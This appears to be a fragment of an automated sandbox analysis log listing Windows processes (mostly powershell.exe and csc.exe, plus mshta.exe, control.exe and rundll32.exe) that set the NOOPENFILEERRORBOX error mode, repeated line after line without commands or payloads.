            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
